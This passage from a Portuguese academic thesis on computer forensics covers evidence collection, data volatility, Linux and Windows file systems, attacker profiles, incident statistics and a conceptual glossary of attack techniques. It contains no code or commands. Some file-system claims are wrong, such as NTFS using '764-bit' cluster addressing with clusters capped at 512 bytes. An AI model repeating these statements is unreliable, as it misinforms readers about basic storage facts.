cí ve l o u p e n al. ( G AL V Ã O, 2 0 0 9 ) .
Outra explicação para o conceito de perícia forense pode ser entendida como, uma
ramificação da Ciência da Computação e, tal terminologia, pode ser encontrada na área de
Criminalística. Na Figura 4, ilustra a explicação (MELO, 2009).
Figura 4 – Relação Ciência da Computação, Criminalística e Computação Forense.

Fonte: Imagem retirada do livro: Computação Forense com Software Livre.
35
Nas sessões seguintes, apresenta-se como essa área trata a captura e manipulação
dessas informações.
2.3.1 Coleta das Informações
Uma coleta de informações é um dos principais itens, ou podendo ser o mais

importante de toda uma perícia forense. Segundo Freitas (2006), diante de uma coleta, o
perito deve seguir alguns procedimentos para assegurar que a evidência não seja
comprometida, substituída ou perdida. Caso esses procedimentos não forem obedecidos, em
um eventual julgamento, os advogados de defesa terão a chance de contestar sua legitimidade,
os juízes poderão considerar tais evidências como inadmissíveis e, sendo assim, todo aquele
caso estará sujeito ao fracasso.
Para cada tipo de incidente deve ser adotado um mecanismo de busca diferente, pois,
segundo Freitas (2006) em um caso de acesso indevido, por exemplo, o perito deverá procurar
por arquivos de log, conexões e compartilhamentos suspeitos, enquanto que em casos de
pornografia, deverá buscar por arquivos temporários do browser, imagens armazenadas no
computador e históricos de sites que foram visitados recentemente. Porém, acima de tudo, é
preciso que o perito tenha familiaridade com o crime cometido, com os programas utilizados
para fazer a varredura atrás de provas e também do sistema operacional envolvido.
Dentro dessa busca por dados, é preciso ficar atento em qual metodologia utilizar.
Segundo Farmer e Venema (2007), existem dois tipos de captura de informações: aquelas que
são denominadas de sistemas vivos e o outro quando a máquina se encontra off-line (ambas
metodologias serão descritas em maiores detalhes na seção seguinte).
Independente da metodologia, ainda sim, é preciso ter uma estrutura formal e seguir
padrões estabelecidos por normas internacionais de padronização. Alguns passos podem ser
tomados para garantir a relevância dos dados, como os seguintes aqui apresentados por Freitas
(2011):
• Identificação – consiste em separar os fatos dos fatores, ou seja, o que venha a

interferir ou não no crime, a fim de estabelecer uma correlação dos acontecimentos
36
relevantes, como datas e nomes de pessoas. Porém, devem ser focados naqueles que,
de alguma forma, estabeleceram comunicação eletrônica com a máquina alvo;
• Preservação – é a capacidade de extrair as evidências, de maneira adequada e
protegida, visando assegurar de que nenhuma informação tenha sido danificada,
destruída ou mesmo comprometida pelos maus procedimentos usados durante a
investigação e de que nenhum vírus ou código malicioso tenha sido introduzido no
computador durante a perícia;
• Análise – é a pesquisa, onde o perito analisa os elementos relevantes ao caso, já que
todos os outros filtros tenham sidos transpostos. Nessa fase, ainda é preciso se atentar
ao fato de que as evidências sejam denominadas de “provas legítimas”, onde consiste
em uma apresentação implacável e inquestionável dos elementos e rastros da
comunicação entre todas as partes envolvidas, além de suas datas e trilhas dos
segmentos de discos utilizados; e
• Apresentação – é o enquadramento de todas as evidências dentro de um formato
jurídico e, sendo inseridas tanto por juízes e advogados, na esfera civil ou criminal, ou
em alguns casos nas duas. O investigador precisa estar perfeitamente sintonizado em
cada uma das etapas presente dentro da metodologia. Desta maneira, ele irá minimizar
o tempo e a quantidade de dados que deve obter até a apresentação das mesmas,
maximizando assim sua eficiência e eficácia.
Além dos passos que devem ser seguidos para a realização de um levantamento de
informações, que possam ser utilizadas dentro da esfera criminal, é importante destacar os
locais, onde podem ser encontradas as informações propriamente ditas. Segundo Freitas
(2011), existem três principais tipos:
• Espaço de arquivos lógicos – faz referência aos blocos de disco rígido, assim que se
inicia o exame, encontra-se atribuídos a algum arquivo vivo ou a uma estrutura como as
tabelas File Allocation Table – Tabela de Alocação de Ficheiros (FAT) ou estruturas
como a inode;
• Espaço subaproveitado – é um espaço formado por blocos do sistema de arquivos, como
por exemplo, a Random Access Memory – Memória de Acesso Aleatório (RAM); e
• Espaço não alocado – em um setor que se encontra “vazio” dentro de uma partição ativa.
37
Dentro dessas três principais fontes, o perito ainda precisa especificar e detalhar de
onde foram, precisamente, retiradas as informações e de quais mídias foram essas. Para
Freitas (2011), os dados podem estar contidos na maioria das vezes dentro de:
• Sistemas de Arquivos – o sistema de arquivo representa uma das maiores fontes de

informação para uma perícia forense. É nos sistemas de arquivos que se podem encontrar
os arquivos de dados e executáveis que serão analisados para que se determine seu
conteúdo e funcionalidade dentro do sistema operacional, seja procurando por imagens,
dados específicos ou programas utilizados para a realização do crime ou atividade
considerada ilícita. É possível ainda observar se existe algum tipo de alteração, exclusão
ou até mesmo inclusões inesperadas modificando diretórios e arquivos (O tema de
Sistemas de Arquivos será abordado em maiores detalhes na seção 2.4.2);
• Arquivos de Logs – os arquivos de logs representam outro item importante dentro de uma
perícia forense, pois com esses logs é possível recriar fatos que ocorreram naquele
determinado sistema computacional, tendo a oportunidade de registrar, por exemplo,
atividades usuais e não usuais dos usuários, dos processos e do sistema, as conexões e as
atividades de rede. O arquivo de log é um indício de ação dentro de um sistema
operacional ou de algum tipo de aplicação que foi utilizada;
• Arquivos Temporários (temp) – são arquivos gerados em seus respectivos diretórios
durante seu tempo de execução, como por exemplo, arquivos de texto e até banco de
dados. Apesar de estes arquivos serem apagados automaticamente no encerramento da
seção que se estava trabalhando, ainda assim podem haver vestígios que precisam ser
averiguados;
• Setor de Swap – é considerada também uma área que armazena arquivos temporários e,
pode conter desde um arquivo até uma partição inteira do disco;
• Setor de Boot – este setor é responsável por inicializar o sistema operacional da máquina,
sendo assim, é possível modificá-lo para que ao ser iniciado carregue algum programa
malicioso;
• Memória – existem informações voláteis e que ainda não foram possíveis de serem
gravadas em disco. Para que esses dados possam ser acessados, é preciso realizar dumps
da memória ou pela gravação de core files, como por exemplo, área de transferência de
arquivos; e
38
• Periféricos – podem ser considerados quaisquer dispositivos implantados ou não na

máquina, que possuam memória (temporária ou não), como por exemplo, pendrives,
impressoras, etc.
Adicionalmente, para Farmer e Venema (2007), independente de qual sistema

operacional estiver sendo utilizado, é preciso sempre ter cuidado com as informações mais
voláteis. Em consequência, é sugerido que siga a ordem de coleta de dados demonstrada a
baixo:
• As memórias dos dispositivos devem ser verificadas, sempre que possível, pois
existem poucas ferramentas que podem fazer este serviço;
• Na memória principal é preciso capturar a RAM e armazená-la de modo off-line;
• Se o sistema de arquivos possuir o journal (ou registro sequencial) é importante
também o seu armazenamento, este tipo de sistema de arquivos pode ser encontrado
no Ext3fs e Ext4fs(sistemas derivados UNIX);
• É muito importante capturar todo o estado transitório que for possível; e
• Também se torna necessário obter todas as informações relevantes no e sobre o disco,
se for necessário salve o disco todo.
Segundo Farmer e Venema (2007), conseguir assegurar totalmente a capacidade de

reprodução e comprovação de resultados acaba sendo muito complexo, pois o sistema está em
constante movimento. Isso significa que os estados iniciais dos computadores sempre estarão
diferentes, como por exemplo, o kernel. Algumas alterações podem acabar se tornando
significativas no sistema operacional e existem ainda as versões de software, que devido à
grande quantidade, tornam-se muito complexas de serem entendidas totalmente.
Ainda que exista toda uma complexidade envolvendo uma coleta de evidências, segue
abaixo alguns passos simples, que para Farmer e Venema (2007), acabam sendo
indispensáveis para qualquer perito:
• O computador deve ser mantido seguro e isolado;

• Registrar toda a cena ou o máximo possível;
• Conduzir uma busca sistemática dos vestígios;
• Coletar e empacotar as evidências, de maneira que se tornem incontestáveis; e
39
• Manter uma cadeia de custódias, ou seja, manter e documentar toda a história

cronológica das evidências, para garantir assim sua integridade e facilitar o uso das
provas na esfera criminal e judicial.
Apesar das dificuldades de conhecer por onde começar uma perícia, encontrar provas
que sejam realmente importantes e mantê-las íntegras, é visível que a coleta de informações
acaba sendo o fator mais importante e delicado. Deste modo, o perito precisa seguir algumas
metodologias que tem como único princípio “de que todas as organizações que lidam com a
investigação forense devem manter um alto nível de qualidade, a fim de assegurar a
confiabilidade e a precisão das evidências” (FREITAS, 2011).
Para atingir tais requisitos, o investigador pode elaborar um Standard Operating
Procedures – Procedimentos Operacionais Padrão (SOPs), onde deve conter os métodos para
todos os tipos de análise conhecida, além de prever a utilização de técnicas aceitas na
comunidade científica internacional, como por exemplo, a criação de chekList (técnica
utilizada na coleta de dados). Tais procedimentos visam adequar as informações coletadas de
maneira que seja aceita dentro dos campos criminais e civis, se necessário (FREITAS, 2011).
2.3.2 Volatilidade da Informação
Para que uma análise possa ser feita de maneira mais eficaz e satisfatória, é necessário
um ciclo de coleta e processamento dessas informações recolhidas. Segundo Farmer e
Venema (2007), “os dados originais devem permanecem protegidos em um estado puro;
qualquer análise deve ser realizada em uma cópia dos dados do computador”. Isto é feito para
que não aconteça nenhuma adulteração dos vestígios deixados pela possível invasão. A coleta
desses dados em um computador é diferente quanto à obtenção de provas em um local de
crime na vida real, pois ao executar qualquer tipo de comando ou programa, o invasor pode
ter armado mecanismos eletrônicos que modifique ou danifiquem os dados manipulados,
tornando assim a coleta destes mais difíceis e complexos. É muito importante a realização
desta cópia, pois permite que técnicas e programas diferentes sejam testados sem
comprometer os dados originais.
Sendo assim, existem dois tipos de mecanismo que podem ser seguidos com o intuito
de tentar preservar a maior parte desses dados, que são a coleta em sistemas denominados
40
vivos (também conhecida por Live Analisys), onde o sistema ainda se encontra ligado, e o
outro é quando o sistema se encontra desligado. Mas em qualquer um dos dois tipos, a
automação na captura das informações é importante, pois na apresentação desses dados para
um possível júri, serão muito menos questionáveis, porque teriam menos chances de
alterações (BARROS, 2009).
No momento de uma coleta de dados, é preciso ter cuidado e muito planejamento, para
que o processo se inicie com o isolamento da máquina da rede e de outros usuários e, em
seguida, é necessário realizar a captura das informações de acordo com seu ciclo de vida, pois
a probabilidade de se perder esses dados varia bastante, desde nanossegundos (ou menos) há
anos. A seguir, pode-se visualizar na Tabela 1 o demonstrativo desse tempo (FARMER;
VENEMA, 2007).
Tabela 1 - Expectativa esperada pelos dados.

Fonte: Perícia Forense Computacional: Teoria e Prática Aplicada.
Sabendo que ao começar a coleta de dados, essa captura acaba modificando outra
informação, a forma para realizar esta atividade depende do que se está procurando.
2.3.3 Sistemas de Arquivos
Como já foi visto, dentro de uma perícia forense, encontrar os dados se torna muito
importante e, o sistema de arquivos, é onde se pode concentrar boa parte dessas informações.
Independente do sistema operacional que se esteja utilizando, pode-se dizer, segundo
Moraz (2009), que “o sistema de arquivos é a forma de organização dos dados do disco
41
rígido”. Isso permite que o sistema operacional acesse, grave e apague os dados. Assim
quanto mais eficiente for o sistema de arquivos, melhor será o desempenho do sistema
operacional.
Serão apresentados, a seguir, dois sistemas operacionais distintos, onde um trará
informações do sistema GNU/Linux cujo código fonte é aberto (open source) e o outro tratará
de um sistema mais conhecido e pago, o Windows™.
2.3.3.1 Sistema de Arquivos GNU/Linux
O sistema de arquivos do Linux, segundo Oliveira et al. (2010), segue o mesmo

padrão de todos os outros sistemas UNIX, onde se encontra organizado em formato de árvore
hierarquizada, resultando em uma única estrutura que agrega todas as informações referentes
ao sistema de arquivos.
Cada nó dessa árvore pode ser um arquivo, um dispositivo de entrada e saída ou até
mesmo um diretório. O que torna o Linux um sistema operacional diferenciado é o fato de ele
dar suporte a diferentes sistemas de arquivos. Desta maneira, o torna flexível e ajuda a
conviver juntamente com outros sistemas operacionais (OLIVEIRA et al., 2010).
Para Oliveira et al. (2010), as versões mais recentes do Linux, tem a capacidade de
suportar diversos sistemas de arquivos, podendo ser citados entre eles o Ext, Ext2, Ext3, Ext4,
ReiserFS, vfat, proc, smb, ncp, iso9660, sysv, hpfs, affs e ufs.
Para Fairbanks et al. (2010), o sistema de arquivo Ext4 é atualmente mais utilizado
dentro do mundo Linux, sendo assim mais presente na maioria das distribuições.
Mas antes de chegarmos ao sistema de arquivos mais utilizados no Linux atualmente,
é preciso entender as versões que a antecederam. A seguir, será apresentada uma introdução
ao Ext, Ext2, Ext3 e, finalmente, uma explicação do Ext4, segundo Morimoto (2007) e
Fairbanks et al. (2010).
Em 1992, foi introduzido o sistema de arquivos denominado Extended File System –
Sistema de Arquivos Extendidos (Ext). Este sistema possuía suporte para a criação de
partições que chegavam ao seu tamanho máximo de 2 GB e oferecia apoio a nomes de
arquivos com no máximo 255 caracteres. Seu desempenho era baixo e muito sujeito a
42
fragmentações de arquivos quanto o sistema de arquivo FAT8. Foi preciso fazer uma
atualização deste sistema de arquivos, quando começaram a surgir Hard DisKe – Disco
Rígido (HDs) com capacidade superior a 2 GB (MORIMOTO, 2007).
Em 1993, foi lançada a versão Ext2, onde este sistema dava suporte a partições de até
32 TB, ainda mantinha o apoio de nomes de arquivos com no máximo 255 caracteres e incluía
outros recursos. O maior problema encontrado nesta versão é que ela não trazia nenhum tipo
de tolerância a falhas (MORIMOTO, 2007).
Só em 1999, foi introduzido o Ext3, onde este problema de intolerância a falhas foi
corrigido. Além desta melhoria, esta versão trazia junto a ela o recurso de journaling que é
uma espécie de “diário” onde armazena e fornece uma lista das alterações realizadas. Assim,
permite-se que o sistema de arquivos seja reparado, de forma muito mais rápida, após um
desligamento incorreto (MORIMOTO, 2007).
O sistema de arquivos Ext3 possibilita três modos de operação, sendo eles
(MORIMOTO, 2007):
• Modo ordered (o default) – onde o journal é atualizado a cada finalização de uma

determinada operação. Este mecanismo faz com que diminua um pouco o seu
desempenho, já que a cabeça de leitura do HD precisa realizar duas operações de
gravação, uma no arquivo que foi alterado e a outra no journal, ao invés de ser uma
única vez (a do arquivo alterado);
• Modo writeback – o journal armazena os dados apenas da estrutura do sistema de
arquivo e não em relação aos arquivos propriamente ditos, além de fazer a gravação
em momentos que o sistema se encontra inativo. É considerado o modo mais
rápido, porém sua segurança é considerada menor contra as perdas e
corrompimentos dos arquivos diante de um desligamento incorreto; e
• Modo journal – é considerado o modo mais seguro, mas em contrapartida se torna
o mais lento de todos. Nesse caso, o journal armazena informações sobre alterações
e traz consigo uma cópia de segurança de todos os arquivos modificados e que
ainda não foram gravados em disco. Para cada alteração realizada, o sistema grava
8
Sistema encontrado nos sistemas operacionais do Windows™ – será descrito em maiores detalhes mais adiante
dentro deste capítulo

43
uma cópia do arquivo, atualiza essas informações referentes ao sistema de arquivos,

grava este arquivo e atualiza novamente o journal, marcando a operação como
concluída. Pelo motivo desse ser o mecanismo mais lento, acaba sendo o menos
utilizado.
Desenvolvido em 2006, o Ext4 é atualmente o sistema de arquivos mais usado para as

distribuições Linux, embora seu antecessor fosse bastante utilizado, existiam limitações, das
quais os desenvolvedores buscaram resolver para esta nova versão, como por exemplo: o
tratamento dado com o tamanho crescente de dispositivos de armazenamento, a organização
dos grupos de blocos e tempo de alocação extendido (FAIRBANKS et al., 2010).
2.3.3.2 Sistema de Arquivos Windows™
Nos sistemas operacionais do Windows™ podem ser encontrados três tipos de

sistemas de arquivos, que serão descritos abaixo segundo Morimoto (2007).
O primeiro sistema que podemos encontrar é o FAT16, já que ele é compatível com
praticamente todos os sistemas operacionais e também dispositivos, como por exemplo,
câmeras e celulares. Este sistema é utilizado como padrão em cartões SD e pendrives de até 2
GB. O FAT16 utiliza endereços de 16 bits para endereçar os clusters na partição, assim
permitindo que o máximo seja 65536 clusters, sendo que cada um não possa ultrapassar 32
KB, isso acaba resultando em um limite de 2 GB por partição criada (MORIMOTO, 2007).
Com a criação do FAT32, o endereçamento dos clusters seria de 32 bits,
proporcionando assim partições muito maiores, podendo chegar até 32 terabytes. Os
endereços de 32 bits permitiam a utilização de clusters de até 4 KB, porém, pensando em seu
desempenho, eles seriam utilizados apenas para as partições de até 8 GB, onde acima disso, os
clusters iriam variar de acordo com sua partição. Outra limitação do FAT32 é que mesmo se
utilizar uma grande partição, ainda é muito difícil armazenar arquivos únicos com mais de 4
GB, o que acaba sendo um enorme problema (MORIMOTO, 2007).
O sistema de arquivos New Technology File System – Nova Tecnologia em Sistema de
Arquivo (NTFS), desde o seu começo, teve incorporado a capacidade de endereçar clusters
utilizando 764 bits, porém sua única limitação acabava sendo o tamanho dos setores do HD.
Os setores possuem 512 bytes. Assim, o tamanho dos clusters que utilizam do NTFS poderá
44
chegar ao máximo em 512 bytes, não importando o tamanho da partição. Um fator importante
no sistema de arquivos do NTFS é ser superior ao FAT em questão a tolerância de falhas. No
sistema FAT quando o computador trava ou é desligado de forma acidental enquanto estão
sendo atualizados arquivos ou diretórios no HD, existe a possibilidade do sistema se tornar
incoerente, como por exemplo, agrupamentos perdidos. Para resolver este tipo de problema,
era necessária a utilização do scandisk toda vez que houvesse o desligamento incorreto
(MORIMOTO, 2007).
Já no sistema NTFS, é mantido um log, contendo todas as operações realizadas, assim
se houvesse um desligamento repentino, na próxima vez que existisse o boot, o sistema iria
examinar o log e, deste modo, descobriria exatamente em que ponto a atualização parou,
tendo a chance de corrigir o erro de maneira automática, evitando assim uma grande
possibilidade de perder os dados (MORIMOTO, 2007).
Com a evolução dos sistemas de arquivos, tanto do Linux quanto do Windows™,
tornou-se muito mais prático restaurar dados, o que para uma perícia é fundamental. Basta
apenas utilizar de ferramentas específicas para tal atividade.
2.4 PERFIL DO INVASOR
Apesar da maioria dos incidentes analisados ser difícil realizar a identificação real do
atacante, é possível dizer que tanto um ataque quanto uma invasão a um sistema é realizado
por algum motivo (seja esse conhecido ou não) e por uma pessoa. Dentro desse cenário pode
se classificar os seguintes invasores:
• Funcionário Insatisfeito – pessoa que julga ter sido demitida ou punida de alguma
forma indevida e, assim, se sentindo injustiçada, busca destruir ou danificar qualquer
tipo de informação que possa trazer danos para aquela empresa;
• Wannabe – indivíduo que já leu uma grande quantidade de informações e acredita já
estar apto há entrar no mundo hacker (ULBRICH; DELLA VALLE, 2006);
• Wizard – tem um grande conhecimento do funcionamento interno de sistemas e tem a
capacidade de manipular hardware e software (ARGOLO, 2005);
• Larval Stage – denominado como estágio larval, é o período em que o aspirante a
hacker se isola totalmente a fim de adquirir conhecimento em programação que pode
45
ser considerado um fator importante nesse processo de transformação e pode variar de

seis meses a dois anos (ULBRICH; DELLA VALLE, 2006);
• Guru – pode ser considerado um administrador experiente, cuja habilidade é
programação. Ele checa se existem programas de segurança e esquemas de log,
existindo esse tipo de segurança, evita seus alvos (ARGOLO, 2005);
• Hacker – pessoa que possui grande conhecimento nas áreas de: programação, redes e
sistemas operacionais. Porém, segue uma rigorosa ideologia, que consiste nunca
utilizar desses conhecimentos para o mal (ULBRICH; DELLA VALLE, 2006);
• Lammer ou Script Kid – indivíduos que possuem pouco ou nenhum conhecimento do
mundo hacker, assim tendo que utilizar programas criados por outros invasores
experientes com o intuito de invadir sistemas; e
• Cracker – possui os mesmos conhecimentos dos hackers, porém, utiliza de forma
antiética suas habilidades, seja para espionar, roubar ou danificar as informações
(empresariais, pessoais ou governamentais) (ULBRICH; DELLA VALLE, 2006).
É possível definir os incidentes causados a partir dos seus realizadores, conforme as

definições abaixo (ARGOLO, 2005):
• Sabotagem interna;
• Monitoramento não autorizado;
• Desconfiguração de sites;
• Códigos maliciosos;
• Uso indevido do sistema;
• Acesso a informações confidenciais; e
• Invasão.
Independente do perfil de invasor e de seu foco de ataque é possível generalizar suas

práticas, ou seja, seu caminho percorrido até a realização total do incidente. A seguir, serão
apresentados seus passos segundo Reis e Geus (2002):
• Identificação do alvo;
• Busca por vulnerabilidades no alvo;
46
• Comprometimento inicial;
• Aumento de privilégio;
• Tornar-se invisível;
• Reconhecimento do sistema;
• Instalação de back doors;
• Limpeza dos rastros; e
• Retorno por uma back door.
Conhecer o perfil do invasor, tipos de incidentes e passos para a realização podem

ajudar na identificação tanto do problema quanto da sua correção.
2.5 CONHECENDO MAIS SOBRE ATAQUES
Qualquer pessoa hoje que tenha um computador conectado a Internet estará sempre
sujeita a ataques, invasões, roubos de dados e outros danos causados, sejam de crackers ou
pessoas conhecidas.
A definição de ameaças e ataques para Nobre (2007) está relacionada a uma possível
violação do sistema computacional, podendo ser classificados em dois tipos: aquelas ameaças
acidentais, quando não houve planejamento, e ameaças intencionais, onde tudo foi
premeditado. Pode ser considerado desde um monitoramento não autorizado até ataques
realizados por crackers.
Pode-se dizer ainda que as principais ameaças encontradas nas redes de computadores
são as de destruição de informações ou recursos, alteração de dados, espionagem industrial,
que são revelações de segredos confidenciais, roubos, alterações ou perda de dados, chegando
até casos mais críticos que é a paralisação dos serviços (NOBRE, 2007).
É considerado um ataque quando uma ameaça intencional se concretiza. Os motivos
para os ataques acontecerem variam bastante, podendo ser: desde uma simples curiosidade, a
um interesse em ter conhecimento sobre sistemas, chegando aos casos mais graves, que são
aqueles ataques que envolvem o campo financeiro como: extorsões, chantagens, espionagem
industrial, até denegrir a imagem do governo, da empresa ou apenas um serviço. Quando isso
ocorre a notícia se espalha proporcionalmente de acordo com a fama da vítima, e ao destruir a
imagem publicamente traz consigo muitos danos, já que vem ao conhecimento de muitas
47
pessoas aquele fato, passando uma impressão de que a instituição não é muito segura para
fazer qualquer tipo de negociação dependendo da situação (NOBRE, 2007).
Na Figura 5 é mostrado um gráfico com o demonstrativo dos tipos de ataques mais
reportados ao CERT.br (2013c), no período de janeiro a março de 2013.
Figura 5 – Incidentes reportados ao CERT.br (Tipos de ataques)

Fonte: http://www.cert.br/stats/incidentes/2013-jan-mar/tipos-ataque.html
É possível visualizar na Figura 5, que o scan foi o ataque mais utilizado entre janeiro a
março de 2013, seguido pelas fraudes, worms, entre outros. Abaixo segue uma explicação
sobre cada um destes tipos de ataques (CERT.br, 2013c):
• Worm – os worms são notificações de quaisquer atividades maliciosas, que está

diretamente relacionado com o processo automático de propagação de códigos
maliciosos na rede;
• DoS9 – são negações de serviço, utilizados em ataques cuja finalidade é a retirada
de um serviço, computador ou rede;
• Invasão – é um tipo de ataque que obtém acesso não autorizado a um determinado
computador ou rede;
• Web – são casos em particulares, cujo foco dos ataques é especificamente os
servidores web ou desconfigurações de determinadas páginas da Internet;
9
Denial of Service – Negação de Serviço (DoS).
48
• Scan – são varreduras realizadas em redes de computadores, buscando aqueles que

se encontram ativas e quais serviços que eles estão utilizando. É um mecanismo
bastante utilizado por ataques, pois com o recurso de scan é possível levantar
vulnerabilidades em um determinado computador; e
• Fraude – é uma categoria que engloba qualquer tipo de atividade cujo resultado visa
obter algum tipo de vantagem sobre o outro.
Segundo o McAfee Avert Labs (2013), o relatório de uma empresa de prevenção de

intrusões e gerenciamento de risco em segurança, no último trimestre de 2012 houve uma
série de mudanças e reviravoltas. A violação de dados atingiu como um todo, no referido
trimestre superando assim o resultado de 2011, já o crescimento dos demais malwares de uma
maneira global teve uma queda também no mesmo período de 2011. Mas em contrapartida,
existiu um avanço em determinadas categorias de malwares, como por exemplo,
ransomware10, os chamados signed binaries (binários assinados), os Rootkits11 e malwares
Mac12, vêm tendo um aumento. Os roubos de senhas, Trojans (ou também conhecidos por
Cavalo de Tróia) e os denominados AutoRun 13, também mostraram um forte crescimento.
Já na web, segundo MacAfee (2013), houve um crescimento de 20 por centro no
último trimestre no que diz respeito à URLs suspeitas, conhecida por phishing, e uma
infecção derivada dos botnets14.
Segundo MacAfee (2013), é possível saber como funciona o ataque e como ele vai
proceder, já à percepção sobre as condições e motivação dos criminosos, ainda carece de
informações. Porém a ideologia básica da maioria dos cibercriminosos é relativamente
simples, a de fazer dinheiro. Dentro deste mundo, pode se classificar os cibercrimes em três
categorias: cibercrime – visa buscar lucro e discrição, duqu – estão preocupados com
sabotagem e espionagem e o shamoon – aqueles que semeiam o caos e a destruição.
10
É uma família de malwares, cuja finalidade é transmitir os dados de forma que virem seus “reféns”, assim
tendo a possibilidade de extorquir dinheiro da vítima (McAfee, 2013).
11
Software desenvolvido para esconder a existência de alguns processos ou de programas, para que não sejam
detectados e assim dando acesso contínuo e privilegiado a um determinado computador (McAfee, 2013).
12
Mac é um malware desenvolvido para a plataforma da Apple (McAfee, 2013).
13
É um mecanismo que faz com que um determinado arquivo ou programa seja executado automaticamente
(McAfee, 2013).
14
É uma coleção de agentes de software que executam de maneira autônoma e automática (McAfee, 2013).
49
Com o crescimento do uso de dispositivos móveis, como por exemplo, os

smartphones, fica evidente que os criminosos também iriam explorar esse nicho, o que aponta
o relatório trimestral da MacAfee (2013), mostrando que é a mais nova tendência.
Na Figura 6 a seguir, aponta que a plataforma Android é considerada o maior alvo
dentre as demais.
Figura 6 – Comparativo de malwares por plataformas móveis.

Fonte: Relatório Trimestral – MacAfee Avert Labs.
Conhecendo os riscos que os usuários correm ao colocarem suas máquinas na rede,

no tópico a seguir serão tratados os ataques mais conhecidos.
2.5.1 Tipos de Ataques e Outras Técnicas:
Será visto nesta seção os principais ataques já usados e que ainda são muito
populares entre os criminosos, segundo Melo (2009).
• Ataque ao Servidor DNS – trata-se de um envenenamento de cache do Domain Name

System – Sistema de Nomes de Domínio (DNS), consiste em alterar o DNS dentro de
uma rede de computadores, fazendo com que a URL de um determinado site aponte
para outro servidor. Ao realizar esta atividade, o usuário ao acessar a tal URL
modificada, acaba sendo direcionado para o servidor controlado pelo criminoso,
estando apto a roubar informações da vítima;
50
• E-mail – trata-se quando um criminoso, nesse caso também chamado de estelionatário,

envia e-mails falsos, onde sua identidade é mascarada através de instituições
conhecidas, como por exemplo, bancos, governo, empresas de cartão de crédito, etc.
Essas vítimas tiveram seus e-mails previamente capturados, e para a realização deste
tipo de ataque, o criminoso utiliza servidores de e-mails mal configurados, assim
permitindo o envio de muitas mensagens do mesmo tipo para milhões de pessoas;
• iPhishing – trata-se da busca por vulnerabilidades que tiveram consequências do
rápido desenvolvimento da tecnologia, que na maioria das vezes acaba focando nas
funcionalidades e no design, deixando o aspecto segurança em segundo plano. Este
ataque pode ser realizado de muitas maneiras, porém o jeito mais fácil seria por
envenenamento de DNS, também conhecido como Ataque a Servidor de DNS;
• Sites de Relacionamentos – por serem ambientes descontraídos acabam tendo a visão
de segurança deixada de lado. É nesse momento que criminosos entram em ação, pois,
com inclusão digital, muitos usuários não tem conhecimento suficiente sobre os riscos,
assim o golpista pode passar links, URLs modificadas, para que as pessoas acessem e
acabam ficando vulneráveis ao roubo de informações, como ocorre no iPhishing;
• Ataques em Redes Sociais – por conter bastantes informações pessoais dos usuários, o
roubo de identidade é o principal objetivo desses ataques;
• Botnets e Zombies – os botnets, também conhecidos por bot, são capazes de se
propagar de maneira automática assim como os worms fazem, e tem como intuito
explorar as vulnerabilidades existentes ou as falhas nas configurações de softwares
instalados em um determinado computador. Quando o computador é infectado recebe
o nome de Zombie;
• Rootkit – software que tem como objetivo a instalação de binários, módulos e
bibliotecas, que trazem muitos recursos, como por exemplo, Backdoors, Cleanlogs e
Key Loggers, ou seja, tudo que auxilie o invasor a esconder seus vestígios, assim
dando acesso contínuo e privilegiado a um determinado computador;
• Probing – não é considerado um ataque, mas é um tipo de mecanismo para adquirir
informações para a então realização do ataque propriamente dito;
• Vírus – é um programa que pode ter atuação autônoma ou em outro programa que é
executável assim tornando-o infectado. Mas, para que o vírus funcione, é preciso de
um arquivo hospedeiro ou de qualquer meio que sirva como meio de transporte, assim
o propagando e dando a continuidade no processo de infecção;
51
• Backdoors – trata-se de uma técnica utilizada por invasores, para garantir uma forma
de retornar a um computador já comprometido, após um ataque bem sucedido;
• Worms – um tipo de malware que se propaga, de maneira automática, por meio de
redes. Dessa forma, consegue-se enviar cópias de si mesmo de um computador para o
outro;
• Spywares – trata-se de um software de computador que usufrui as capacidades dos
navegadores de Internet em executar aplicações;
• Buffer Overflow – trata-se de uma técnica de tentar armazenar mais informações do
que a memória suporta, assim causando erros e abrindo uma “brecha” para que o
invasor acesse o sistema. Depois de concretizado o ataque, o invasor consegue
adquirir privilégios de administrador, ou seja, tem a possibilidade de efetuar qualquer
coisa na máquina atacada;
• Exploits – são programas contendo poucas linhas de código, sendo a maioria desses
programas escritos na linguagem de programação C, visando explorar
vulnerabilidades já conhecidas;
• Spoofing – trata-se de uma técnica muito utilizada por crackers, que consiste em
mascarar seu IP de origem com outro IP falsificado, de maneira que sua localização
permaneça desconhecida;
• Mail Bomb – trata-se de uma técnica de sobrecarregar um computador com mensagens
eletrônicas;
• Smurf – trata-se de uma técnica onde o invasor envia sucessivas requisições ICMP
para um determinado endereço de broadcast, sendo que as respostas serão enviadas ao
alvo, que não é capaz de suportar tantos pacotes. Este tipo de ataque se concretiza
utilizando o Spoofing;
• Sniffing – trata-se da captura de informações de uma determinada máquina ou em um
tráfego de rede, sem autorização para esta coleta. Utilizando desta técnica, é possível
roubar senhas, nomes e até perceber o comportamento dos usuários. Para a realização
desta captura, existem programas específicos que auxiliam, chamados analisadores de
protocolo ou sniffer;
• Scamming – consiste na técnica de roubar senhas e números de contas bancárias,
através de e-mails falsos oferecendo um serviço do banco;
• Teclado Virtual – trata-se de um programa utilizado para roubar dados dos usuários
quando este acessa sites de bancos. Este ataque é realizado de maneira que o cracker
52
aloca uma tela de teclado virtual clonado por cima do teclado virtual legítimo, assim
capturando qualquer informação;
• Key Loggers – trata-se de um software que foi desenvolvido com o objetivo de
capturar tudo o que e digitado na máquina alvo;
• Mouse Loggers – trata-se de um software que captura movimentos e cliques de mouse;
• Spam – consiste no envio de mensagens contendo links maliciosos, que poderá então
se concretizar em um ataque ou invasão;
• Trojans (ou Cavalos de Tróia) – trata-se de um programa criado com o objetivo de
roubar informações ou até mesmo o controle da máquina atacada. Tal ataque vem
mascarado através de arquivos anexados a e-mails, onde este programa é quase
sempre uma animação ou até mesmo imagens pornográficas, que no instante que são
visualizados ou executados, o sistema sofre a infecção;
• Ataque de Força Bruta– trata-se uma estratégia utilizada para quebrar cifragens de
dados, onde através de uma lista de chaves, o algoritmo percorre todas estas lista até
encontrar a chave correta, ou testa todas as combinações possíveis; e
• Engenharia Social – consiste na arte de enganar e explorar a confiança das pessoas, a
fim de adquirir informações valiosas de uma determinada organização ou pessoa
específica.
É notório que existem muitos tipos de ataques, mas quando algum ocorre,
geralmente, é utilizada mais de uma única técnica. A seguir, poderá ser visto como um
cracker executa um ataque bem sucedido, segundo Ulbrich e Della Valle (2006):
• Em um primeiro momento feito a descoberta de vulnerabilidades, e antes que seja

efetuado logo o ataque é recomendado que conheça um pouco melhor a vítima, seja
